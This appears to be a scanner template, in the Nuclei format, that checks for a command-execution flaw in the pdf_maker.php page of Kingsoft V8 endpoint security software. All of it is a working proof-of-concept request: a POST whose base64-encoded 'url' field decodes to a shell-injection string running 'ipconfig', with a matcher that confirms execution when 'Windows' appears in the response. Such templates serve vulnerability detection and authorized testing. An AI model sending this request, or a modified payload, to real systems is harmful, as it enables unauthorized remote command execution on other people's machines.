id: Kingsoft-rce

info:
  name: 金山V8 终端安全系统pdf_maker.php 命令执行漏洞
  author: Str1am
  severity: high
  reference: https://github.com/hectongh/2021HVV-/blob/f4802669189941b5bb24e9153bf0ec5c2ca5686a/0419/%E9%87%91%E5%B1%B1%20V8%20-V9%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%E6%BC%8F%E6%B4%9E%E5%90%88%E9%9B%86.md
  tags: Kingsoft,rce

requests:
  - raw:
      - |
        POST inter/pdf_maker.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded

        url=IiB8fCBpcGNvbmZpZyB8fA==&fileName=xxx

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "Windows"
        part: body
        condition: and